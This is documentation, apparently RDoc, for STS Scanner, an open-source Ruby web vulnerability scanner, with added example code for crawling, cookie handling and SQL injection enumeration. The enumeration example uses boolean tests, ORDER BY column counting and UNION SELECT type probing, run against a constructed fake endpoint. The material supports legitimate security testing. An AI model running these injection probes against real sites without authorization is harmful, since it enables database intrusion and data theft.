sts-scanner.rb

Path: sts-scanner.rb
Last Update: Tue Jan 08 19:48:33 +1100 2008

Synopsis

Command line interface to the STS scanner. It extends the simple scanner and extended scanner from Network Security Tools by Justin Clarke et al. (Ch. 8 and 9) with additional capabilities and functionality.

The scanner builds the attack surface either by crawling a web application itself or by parsing a Burp proxy log file (see portswigger.net/proxy/), or both.

It has the following crawling capabilities:

  1. Understands the authentication schemes listed below
  2. Understands the HTTP schemes listed below
  3. Uses Hpricot to parse HTML pages, identifying URLs from:
       a. Frame and iframe tags (src value)
       b. Anchor tags (href value)
       c. IMG tags (src value)
       d. Form tags and their fields, used to build GET requests with query strings and POST requests with bodies
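An added illustration of the crawling step above, not the scanner's own lib/crawler code: it pulls frame, iframe, anchor and img targets plus form actions and fields out of a constructed HTML page and turns them into candidate GET/POST requests, keeping only in-scope hosts. It uses regular expressions in place of Hpricot so that it runs with the Ruby standard library alone; the sample page and the `Request` struct are assumptions of this example.

```ruby
require 'uri'

# One candidate request on the attack surface: verb, absolute URL, POST body params.
Request = Struct.new(:verb, :url, :params)

# Pull one attribute value out of a single tag's HTML (double, single or no quotes).
def extract_attr(tag_html, attr)
  m = tag_html.match(/\b#{attr}\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i)
  m ? (m[1] || m[2] || m[3]) : nil
end

# Build the request list for +html+ fetched from +base_url+.
# Regex-based stand-in for an HTML parser (the scanner itself uses Hpricot).
def build_attack_surface(base_url, html)
  base = URI(base_url)
  requests = []

  # Frames, iframes, anchors and images all yield a plain GET.
  html.scan(/<(frame|iframe|a|img)\b[^>]*>/i) do
    tag  = $&
    attr = ($1.downcase == 'a') ? 'href' : 'src'
    target = extract_attr(tag, attr)
    next if target.nil? || target.empty? || target =~ /\A(javascript|mailto):/i
    abs = URI.join(base_url, target)
    next unless abs.host == base.host          # stay in scope
    requests << Request.new('GET', abs.to_s, {})
  end

  # Forms: action + named fields become a GET query string or a POST body.
  html.scan(%r{<form\b[^>]*>.*?</form>}im) do
    form     = $&
    open_tag = form[/<form\b[^>]*>/i]
    action   = extract_attr(open_tag, 'action') || base_url
    verb     = (extract_attr(open_tag, 'method') || 'GET').upcase
    fields   = {}
    form.scan(/<(input|select|textarea)\b[^>]*>/i) do
      name = extract_attr($&, 'name')
      fields[name] = extract_attr($&, 'value') || '' if name
    end
    abs = URI.join(base_url, action)
    next unless abs.host == base.host
    if verb == 'POST'
      requests << Request.new('POST', abs.to_s, fields)
    else
      q = [abs.query, URI.encode_www_form(fields)].compact.reject(&:empty?).join('&')
      abs.query = q.empty? ? nil : q
      requests << Request.new('GET', abs.to_s, {})
    end
  end
  requests.uniq
end

# Constructed sample page (not a real site) exercising each tag type plus
# an off-site link and a javascript: link that must be dropped.
SAMPLE_HTML = <<~HTML
  <html><body>
  <iframe src="/ads/frame.html"></iframe>
  <a href="about.html">About</a>
  <a href="http://other.example.org/x">offsite</a>
  <a href="javascript:void(0)">noop</a>
  <img src="/img/logo.png">
  <form action="/search" method="get">
    <input type="text" name="q" value="test">
    <input type="submit" value="Go">
  </form>
  <form action="/login" method="POST">
    <input name="user" value="">
    <input type="password" name="pass">
    <input type="hidden" name="csrf" value="abc123">
  </form>
  </body></html>
HTML

if __FILE__ == $0
  build_attack_surface("http://www.example.com/", SAMPLE_HTML).each do |r|
    puts r.params.empty? ? "#{r.verb} #{r.url}" : "#{r.verb} #{r.url} body=#{URI.encode_www_form(r.params)}"
  end
end
```

The unnamed submit button is skipped, the off-site and javascript: links are dropped, and the POST form keeps its hidden csrf field so the request it produces is replayable.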

The following vulnerabilities are tested for:

  1. SQL Injection
  2. Cross Site Scripting
  3. Directory Listings

The scanner can enumerate and exploit discovered SQL injection points. The following information is enumerated:

  1. Whether the injection is valid (i.e., not a false positive)
  2. Backend database type (currently MS SQL, Oracle and MySQL)
  3. Number of columns in the query at the injection point
  4. Data type of each identified column
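An added example of the four enumeration steps above, not the scanner's exploit/sqlTest code: a true/false pair to rule out a false positive, ORDER BY probing for the column count, an all-NULL UNION to confirm it, then one typed literal at a time to classify each column, with the backend guessed from error wording. The target is a constructed stand-in for a vulnerable page whose error messages mimic MS SQL; its type-compatibility rules are a deliberate simplification and an assumption of this example, not a model of any real DBMS.

```ruby
# Ground truth the probes must recover (an assumption of this stand-in).
TRUE_COLUMNS = [:varchar, :int, :datetime].freeze

# Constructed vulnerable endpoint: interpolates the id parameter into SQL and
# answers ORDER BY / UNION probes the way an MS SQL backed page would (simplified).
def fake_endpoint(id_param)
  sql = "SELECT name, qty, added FROM products WHERE id = #{id_param}"
  return "OK: (no rows)" if sql =~ /AND 1=2/
  if (m = sql.match(/ORDER BY (\d+)/i))
    n = m[1].to_i
    return "OK: Widget" if (1..TRUE_COLUMNS.size).cover?(n)
    return "Error: The ORDER BY position number #{n} is out of range of the number of items in the select list."
  end
  if (m = sql.match(/UNION SELECT (.+?)--/i))
    probes = m[1].split(',').map(&:strip)
    return "Error: All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists." if probes.size != TRUE_COLUMNS.size
    probes.each_with_index do |p, i|
      next if p.casecmp('NULL').zero?                  # NULL fits every column
      want = p.start_with?("'") ? :varchar : :int      # string literal vs integer literal
      return "Error: Conversion failed when converting the varchar value #{p} to data type #{TRUE_COLUMNS[i]}." unless TRUE_COLUMNS[i] == want
    end
    return "OK: Widget"
  end
  "OK: Widget"
end

# Backend guess from well-known DBMS error signatures. The page says which
# backends the scanner supports, not how it tells them apart; this is one common way.
def fingerprint_dbms(text)
  case text
  when /Conversion failed when converting|Unclosed quotation mark|ORDER BY position number/i then 'MS SQL'
  when /You have an error in your SQL syntax|Unknown column/i then 'MySQL'
  when /\bORA-\d{5}\b/ then 'Oracle'
  else 'unknown'
  end
end

# +request+ is any callable taking the raw injected value and returning the body.
# Returns nil when the point is not injectable, else a hash of what was learned.
def enumerate_injection(request, max_cols = 20)
  baseline = request.call("1")
  # 1. A real injection answers the true/false pair differently; a false positive does not.
  return nil unless request.call("1 AND 1=1") == baseline && request.call("1 AND 1=2") != baseline

  # 2. ORDER BY n succeeds for n <= column count and fails at count + 1.
  cols = nil
  first_error = nil
  (1..max_cols).each do |n|
    r = request.call("1 ORDER BY #{n}--")
    next unless r.start_with?("Error")
    cols = n - 1
    first_error = r
    break
  end
  return nil if cols.nil? || cols.zero?

  # 3. Confirm the count with an all-NULL union.
  nulls = Array.new(cols, 'NULL')
  return nil if request.call("1 UNION SELECT #{nulls.join(',')}--").start_with?("Error")

  # 4. Per column, swap one NULL for a typed literal; the first accepted literal names the type.
  types = (0...cols).map do |i|
    found = { 'int' => '1', 'varchar' => "'a'" }.find do |_, lit|
      row = nulls.dup
      row[i] = lit
      !request.call("1 UNION SELECT #{row.join(',')}--").start_with?("Error")
    end
    found ? found[0] : 'other'
  end

  { dbms: fingerprint_dbms(first_error), columns: cols, types: types }
end

if __FILE__ == $0
  p enumerate_injection(method(:fake_endpoint))
end
```

Against the stand-in this reports three columns typed varchar, int and other (the datetime column accepts neither probe literal), and the ORDER BY error text identifies the backend as MS SQL. The `--` terminator and the literal set are the usual choices for that backend; a real target may need a different comment sequence or extra probe types.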

The scanner and crawler can handle the following authentication schemes:

  1. Proxy authentication
  2. Basic authentication
  3. Digest authentication
  4. Cookie authentication
  5. SSL client certificate authentication
  6. Server certificate verification against a CA

The scanner and crawler support the following HTTP features:

  1. HTTP 0.9, 1.0 and 1.1
  2. SSL connections
  3. Memory of previously visited pages, with the Referer header updated accordingly
  4. Updating of the cookie jar from server Set-Cookie responses
  5. Ability to turn following of 302 redirects on and off
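An added example covering items 3 to 5 of the list above, not the scanner's lib/crawler or lib/mechanize code: a minimal session that remembers the last page as the next Referer, feeds a cookie jar from Set-Cookie headers while honouring the Domain, Path and Secure attributes, and follows a 302 only when the flag is on. Responses are constructed hashes so it runs offline; the class and its method names are assumptions of this example.

```ruby
require 'uri'

Cookie = Struct.new(:name, :value, :domain, :path, :secure)

class Session
  attr_reader :jar, :referer

  def initialize(follow_redirects: true)
    @jar = []
    @referer = nil
    @follow_redirects = follow_redirects
  end

  # Headers the crawler would send for +url+: Referer plus the matching cookies.
  def request_headers(url)
    u = URI(url)
    h = {}
    h['Referer'] = @referer if @referer
    matching = @jar.select { |c| cookie_matches?(c, u) }
    h['Cookie'] = matching.map { |c| "#{c.name}=#{c.value}" }.join('; ') unless matching.empty?
    h
  end

  # Feed a response back: update the jar from Set-Cookie, remember the page as
  # the next Referer, and return the redirect target to follow (nil if none, or
  # if redirect following is switched off).
  def consume(url, status, headers)
    u = URI(url)
    Array(headers['Set-Cookie']).each { |sc| store(parse_set_cookie(sc, u)) }
    @referer = url
    return nil unless @follow_redirects && (300..399).cover?(status) && headers['Location']
    URI.join(url, headers['Location']).to_s
  end

  private

  def parse_set_cookie(raw, u)
    parts = raw.split(';').map(&:strip)
    name, value = parts.shift.split('=', 2)
    c = Cookie.new(name, value.to_s, u.host.downcase, default_path(u), false)
    parts.each do |attr|
      k, v = attr.split('=', 2)
      case k.downcase
      when 'domain' then c.domain = v.to_s.sub(/\A\./, '').downcase
      when 'path'   then c.path = v.to_s
      when 'secure' then c.secure = true
      end                                   # HttpOnly, Expires etc. are ignored here
    end
    c
  end

  # RFC 6265 default-path: the request path up to, not including, the last '/'.
  def default_path(u)
    p = u.path.to_s
    i = p.rindex('/')
    (i.nil? || i.zero?) ? '/' : p[0...i]
  end

  # A cookie re-sent with the same name/domain/path replaces the stored one.
  def store(c)
    @jar.reject! { |o| o.name == c.name && o.domain == c.domain && o.path == c.path }
    @jar << c
  end

  # RFC 6265 path-match: exact, or prefix ending in '/' or followed by '/'.
  def path_matches?(cookie_path, request_path)
    request_path = '/' if request_path.empty?
    return true if request_path == cookie_path
    return false unless request_path.start_with?(cookie_path)
    cookie_path.end_with?('/') || request_path[cookie_path.size] == '/'
  end

  def cookie_matches?(c, u)
    host = u.host.downcase
    domain_ok = host == c.domain || host.end_with?(".#{c.domain}")
    secure_ok = !c.secure || u.scheme == 'https'
    domain_ok && secure_ok && path_matches?(c.path, u.path.to_s)
  end
end

if __FILE__ == $0
  s = Session.new(follow_redirects: true)
  # Constructed response: a login page that sets two cookies and redirects.
  nxt = s.consume("http://www.example.com/login", 302,
                  'Set-Cookie' => ['sid=abc; Path=/; HttpOnly', 'tok=xyz; Secure; Path=/admin'],
                  'Location'   => '/home')
  p nxt                                                     # http://www.example.com/home
  p s.request_headers(nxt)                                  # Referer + sid only
  p s.request_headers("https://www.example.com/admin/users") # sid and tok
  p s.request_headers("http://www.example.com/admin/users")  # sid only: tok is Secure
end
```

Note the Secure cookie is withheld on the plain-HTTP request to /admin/users, which is exactly the behaviour the `--cookie "id=1234; secure"` example further down relies on when scanning an SSL target.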

The scanner's attack surface covers the following:

  1. GET and POST requests
  2. URL parameters
  3. POST parameters
  4. HTTP headers: Referer, User-Agent and Cookie
  5. Directory listings
  6. Files

Copyright

Copyright (c) 2007 - 2008 by Security Technology Science Pty Ltd. All rights reserved.

License

This file is part of STS Scanner.

STS Scanner is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

STS Scanner is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with STS Scanner. If not, see <www.gnu.org/licenses/>.

Examples

Without a log file, the scanner crawls the target automatically:

 ruby sts-scanner.rb http://www.example.com

Providing a Burp log file:

 ruby sts-scanner.rb --log example.com.burp http://www.example.com

Tunneling through a proxy:

 ruby sts-scanner.rb --proxy_ip 127.0.0.1 --proxy_port 8080 http://www.example.com

SSL with a cookie on a non-standard port:

 ruby sts-scanner.rb --cookie "id=1234; secure" https://www.example.com:6969

Basic authentication:

 ruby sts-scanner.rb --basic_user uname --basic_password pword http://www.example.com

References

The exploit/dirTest, exploit/xssTest, exploit/sqlTest and parser/burpparser algorithms were ported directly from the Perl source code of Network Security Tools (Ch. 8 and 9) by Justin Clarke et al. See www.oreilly.com/catalog/networkst/ for the sample chapter and the Perl source.

The lib/mechanize directory comes from mechanize.rubyforge.org/mechanize/

Required files

optparse, ostruct, uri, logger, lib/parser, lib/crawler, lib/exploit, lib/mechanize, rubygems, hpricot
